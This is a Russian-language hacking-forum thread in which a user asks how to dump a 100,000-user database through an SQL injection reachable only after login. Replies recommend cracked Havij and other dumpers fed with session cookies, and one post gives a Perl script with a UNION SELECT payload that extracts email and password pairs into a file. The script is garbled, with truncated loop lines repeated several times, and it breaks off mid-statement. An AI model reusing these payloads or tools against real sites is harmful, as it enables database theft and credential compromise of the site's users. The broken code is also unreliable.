HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.04.2011, 12:55
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами: 9436363

Репутация: 55
По умолчанию

вообщем такая штука. стандартная скуль юзается только после прохождения авторизации юзера на сайте. база 100К юзеров, админки нет. единственный вариант тянуть базу через авторизованного юзера.

посмотрел на дамперы что есть у меня, все без авторизации. есть что-то уже готовое, чтобы с кодингом не заморачиваться?
 
Ответить с цитированием

  #2  
Старый 26.04.2011, 13:05
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Toolza от Пашкелы, Havij 1.14 Cracked

Подставляешь в эти программы свои куки, и вперед)
 
Ответить с цитированием

  #3  
Старый 26.04.2011, 22:01
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами: 9436363

Репутация: 55
По умолчанию

mailbrush c Toolza от Пашкелы черта с два без поллитра не разберешься, а доходчивого мануала по ней я не нашел

Havij 1.14 Cracked при открытии load cookie все время выдает доступ к странице запрешен, какой бы урл не вводил
 
Ответить с цитированием

  #4  
Старый 26.04.2011, 22:07
Stalkerhack
Новичок
Регистрация: 17.04.2011
Сообщений: 3
С нами: 7932566

Репутация: 0
По умолчанию

Держи, подойдет?

http://www.slaed.net/files-view-15-word-%E4%EE%EC%E5%ED.html
 
Ответить с цитированием

  #5  
Старый 27.04.2011, 02:47
shellz[21h]
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
С нами: 9680718

Репутация: 118
По умолчанию

Stalkerhack, требуется через инъекцию дампер )

--

http://sqlsus.sourceforge.net/
 
Ответить с цитированием

  #6  
Старый 27.04.2011, 08:37
Stalkerhack
Новичок
Регистрация: 17.04.2011
Сообщений: 3
С нами: 7932566

Репутация: 0
По умолчанию

Сори, тупанул.....через инъекцию? будет вам через инъекцию...xDDDDDDDDDDDDD

[QUOTE="None"]
Данный скрипт не поддерживет поточности. т.к для того что бы использовать поточность в perl его нужно пересобирать вручную:
[QUOTE="None"]
#!/usr/bin/perl
use IO::Socket;
require IO::Socket;
sub mas
{
$tem1 = $_[0];
$const_f = "GET PATH_TO_SCRIPT/?id=-37745+union+all+select+concat(char(60,45,45),email ,0x3a,password,char(60,45,45))+from+db.table+limit +";
$const_l = ",1-- HTTP/1.0\r\nHost: domain.name\r\nUser-Agent: mozzila\r\n\r\n";
$ret_mas = $const_f . $tem1 . $const_l;
return $ret_mas;
}
sub myfunc
{
$temp = $_[0];
$data4 = $temp;
my $sock = IO::Socket::INET->new(PeerAddr => 'SERVER_IP',
PeerPort => 80,
Proto => 'tcp',
Timeout => 600 ) || die "fuck";
$sock->autoflush;
print $sock $data4;
@line = ;
close($sock);
foreach(@line)
{
$iline=$_;
chomp $iline;
if($iline=~m/> dataget.txt");
print (FFF $writeme);
print (FFF "\r\n");
close(FFF);
}
for($i=0;$inew(PeerAddr => 'SERVER_IP',
PeerPort => 80,
Proto => 'tcp',
Timeout => 600 ) || die "fuck";
$sock->autoflush;
print $sock $data4;
@line = ;
close($sock);
foreach(@line)
{
$iline=$_;
chomp $iline;
if($iline=~m/> dataget.txt");
print (FFF $writeme);
print (FFF "\r\n");
close(FFF);
}
for($i=0;$inew(PeerAddr => 'SERVER_IP',
PeerPort => 80,
Proto => 'tcp',
Timeout => 600 ) || die "fuck";
$sock->autoflush;
print $sock $data4;
@line = ;
close($sock);
foreach(@line)
{
$iline=$_;
chomp $iline;
if($iline=~m/> dataget.txt");
print (FFF $writeme);
print (FFF "\r\n");
close(FFF);
}
for($i=0;$inew(PeerAddr => 'SERVER_IP',
PeerPort => 80,
Proto => 'tcp',
Timeout => 600 ) || die "fuck";
$sock->autoflush;
print $sock $data4;
@line = ;
close($sock);
foreach(@line)
{
$iline=$_;
chomp $iline;
if($iline=~m/> dataget.txt");
print (FFF $writeme);
print (FFF "\r\n");
close(FFF);
}
for($i=0;$i
 
Ответить с цитированием

  #7  
Старый 27.04.2011, 12:24
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами: 9436363

Репутация: 55
По умолчанию

всем спасибо. проблема решена с помощью rsaUnDumper. спасибо автору за помощь.

надо было всего лишь добавить куки активной сессии. к сожалению не каждый mysql-дампер такое позволяет сделать.

понял что просче самому написать свой на php
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.